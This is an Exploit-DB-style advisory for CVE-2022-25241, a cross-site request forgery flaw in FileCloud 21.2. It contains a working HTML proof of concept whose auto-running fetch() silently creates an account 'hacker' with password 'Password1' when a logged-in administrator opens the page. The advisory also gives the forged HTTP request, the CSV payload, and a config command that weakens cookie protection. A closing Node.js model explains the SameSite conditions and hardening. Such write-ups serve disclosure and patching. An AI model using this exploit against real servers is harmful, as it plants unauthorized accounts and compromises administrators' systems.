[webapps] FileCloud 21.2 - Cross-Site Request Forgery (CSRF)

# Exploit Title: FileCloud 21.2 - Cross-Site Request Forgery (CSRF)
# Date: 2022-02-20
# Exploit Author: Masashi Fujiwara
# Vendor Homepage: https://www.filecloud.com/
# Software Link: https://hub.docker.com/r/filecloud/filecloudserver21.2
# Version: All versions of FileCloud prior to 21.3 (Fixed: version 21.3.0.18447)
# Tested on:
#   OS: Ubuntu 18.04.6 LTS (Docker)
#   Apache: 2.4.52
#   FileCloud: 21.2.4.17315
# CVE: CVE-2022-25241 (https://www.filecloud.com/supportdocs/fcdoc/latest/server/security-advisories/advisory-2022-01-3-threat-of-csrf-via-user-creation)

# Conditions
1. Only vulnerable if the FileCloud cookies are issued with SameSite=None. In the test setup this was done with:
   echo 'define("TONIDOCLOUD_COOKIE_SAME_SITE_TYPE", "None");' >> /var/www/html/config/cloudconfig.php
2. Use https as the target URL. Browsers only accept SameSite=None together with the Secure attribute, and Secure cookies are only sent over HTTPS, so a plain-http target never receives the session cookies.

# PoC (HTML)
The page below builds the user-import CSV in a Blob and posts it with FormData. Because FormData yields multipart/form-data, the cross-origin fetch() is a CORS "simple" request: no preflight is sent, and credentials: "include" attaches the victim administrator's FileCloud cookies. Loading this page while logged in to the FileCloud admin UI creates the user "hacker" with the password "Password1".

<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Cache-Control" content="no-cache">
<script>
function init(){
  myFormData = new FormData();
  let fileContent = new Blob(["UserName,EmailID,Password,DisplayName,Status,ExpirationDate,Groups,EmailVerified\nhacker,hacker@hacker.com,Password1,hacker,FULL,02/26/2222,Group1,YES\n"], {type: 'application/vnd.ms-excel'});
  myFormData.append("uploadFormElement", fileContent, "user.csv");
  fetch("https://192.168.159.129:8443/admin/?op=import&sendapprovalemail=0&sendpwdasplaintext=0", {
    method: "post",
    body: myFormData,
    credentials: "include"});
}
</script>
</head>
<body onload="init()">
CSRF PoC for CVE-2022-25241
Create hacker user with Password1 via CSV file upload.
</body>
</html>

# HTTPS Request
The request as the browser sends it. Note that the X-XSRF-TOKEN cookies are present but no matching token header or form field is sent: the admin import endpoint accepted the upload on the strength of the session cookies alone, which is what makes the forged request succeed.

POST /admin/?op=import&sendapprovalemail=0&sendpwdasplaintext=0 HTTP/1.1
Host: 192.168.159.129:8443
Cookie: X-XSRF-TOKEN-admin=rhedxvo0gullbvzkgwwv; X-XSRF-TOKEN=rhedxvo0gullbvzkgwwv; tonidocloud-au=admin; tonidocloud-as=29352577-cfaa-42e6-80e5-7a304bc78333; tonidocloud-ah=4514fb08f852d2682151efdb938d377734b1e493
Content-Length: 365
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryiAXsUsJ2ZV54DFuW
Connection: close

------WebKitFormBoundaryiAXsUsJ2ZV54DFuW
Content-Disposition: form-data; name="uploadFormElement"; filename="user.csv"
Content-Type: application/vnd.ms-excel

UserName,EmailID,Password,DisplayName,Status,ExpirationDate,Groups,EmailVerified
hacker,hacker@hacker.com,Password1,hacker,FULL,02/26/2222,Group1,YES
------WebKitFormBoundaryiAXsUsJ2ZV54DFuW--

# CSV file format
UserName,EmailID,Password,DisplayName,Status,ExpirationDate,Groups,EmailVerified
hacker,hacker@hacker.com,Password1,hacker,FULL,02/26/2222,Group1,YES
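Why the two conditions above decide whether the PoC works comes down to the browser's SameSite rules. The following is an added example, not code from the advisory or from FileCloud: a small Node.js model of those rules, run against constructed Set-Cookie lines shaped like the cookies in the captured request. The exact attributes FileCloud emits, and "Lax" as the hardened value, are assumptions; confirm them by reading the Set-Cookie headers in a proxy. Chrome's two-minute "Lax-allowing-unsafe" grace period for cookies with no SameSite attribute is deliberately not modelled.

```javascript
// Added example (not from the advisory): model the browser-side SameSite
// rules that decide whether FileCloud's cookies ride along with the PoC's
// cross-site fetch(). Set-Cookie lines below are constructed; FileCloud's
// real cookie attributes are an assumption.

// Parse one Set-Cookie header into the fields the SameSite decision needs.
function parseSetCookie(header) {
  const parts = header.split(";").map((s) => s.trim()).filter(Boolean);
  const eq = parts[0].indexOf("=");
  const cookie = {
    name: parts[0].slice(0, eq),
    value: parts[0].slice(eq + 1),
    secure: false,
    sameSite: null, // null = attribute absent
  };
  for (const attr of parts.slice(1)) {
    const [key, val = ""] = attr.split("=").map((s) => s.trim());
    const k = key.toLowerCase();
    if (k === "secure") cookie.secure = true;
    else if (k === "samesite") cookie.sameSite = val.toLowerCase();
  }
  return cookie;
}

const SAFE_METHODS = new Set(["GET", "HEAD", "OPTIONS", "TRACE"]);

// Would this cookie be attached to a cross-site request? `req` describes what
// the attacker's page can send: the method, whether the target is HTTPS, and
// whether it is a top-level navigation (link/form) or a subresource request
// such as fetch().
function sentCrossSite(cookie, req) {
  // A missing or unrecognised SameSite value is treated as Lax (Chrome's
  // default since version 80).
  let mode = cookie.sameSite ?? "lax";
  if (!["strict", "lax", "none"].includes(mode)) mode = "lax";

  switch (mode) {
    case "strict":
      return false;
    case "lax":
      // Lax cookies only cross sites on top-level navigations with safe
      // methods, so a fetch() POST never carries them.
      return req.topLevelNavigation && SAFE_METHODS.has(req.method.toUpperCase());
    case "none":
      // None is only honoured together with Secure, and Secure cookies only
      // travel over HTTPS: this is condition 2 of the advisory.
      return cookie.secure && req.https;
  }
}

// Names of the cookies a given cross-site request would carry.
function cookiesAttached(setCookieHeaders, req) {
  return setCookieHeaders
    .map(parseSetCookie)
    .filter((c) => sentCrossSite(c, req))
    .map((c) => c.name);
}

// The PoC's request: fetch() POST from the attacker's page to an HTTPS
// target with credentials: "include"; not a top-level navigation.
const POC_FETCH = { method: "POST", https: true, topLevelNavigation: false };

// Constructed Set-Cookie lines for the vulnerable configuration
// (TONIDOCLOUD_COOKIE_SAME_SITE_TYPE set to "None").
const VULNERABLE_SET_COOKIE = [
  "tonidocloud-au=admin; Path=/; Secure; SameSite=None",
  "tonidocloud-as=29352577-cfaa-42e6-80e5-7a304bc78333; Path=/; Secure; HttpOnly; SameSite=None",
  "tonidocloud-ah=4514fb08f852d2682151efdb938d377734b1e493; Path=/; Secure; HttpOnly; SameSite=None",
];

// The same cookies with SameSite=Lax (assumed hardened setting).
const LAX_SET_COOKIE = VULNERABLE_SET_COOKIE.map((h) => h.replace("SameSite=None", "SameSite=Lax"));

if (typeof require !== "undefined" && require.main === module) {
  console.log("None, HTTPS fetch POST :", cookiesAttached(VULNERABLE_SET_COOKIE, POC_FETCH));
  console.log("None, HTTP fetch POST  :", cookiesAttached(VULNERABLE_SET_COOKIE, { ...POC_FETCH, https: false }));
  console.log("Lax, HTTPS fetch POST  :", cookiesAttached(LAX_SET_COOKIE, POC_FETCH));
  console.log("Lax, top-level GET     :", cookiesAttached(LAX_SET_COOKIE, { method: "GET", https: true, topLevelNavigation: true }));
}
```

Run with `node samesite-model.js`: only the first case lists all three cookie names, which is exactly the combination the advisory requires (SameSite=None over HTTPS). The fourth case shows that Lax still lets cookies cross sites on a top-level GET, so endpoints that change state on GET would not be protected by that setting alone; the import endpoint here is a POST, which Lax blocks.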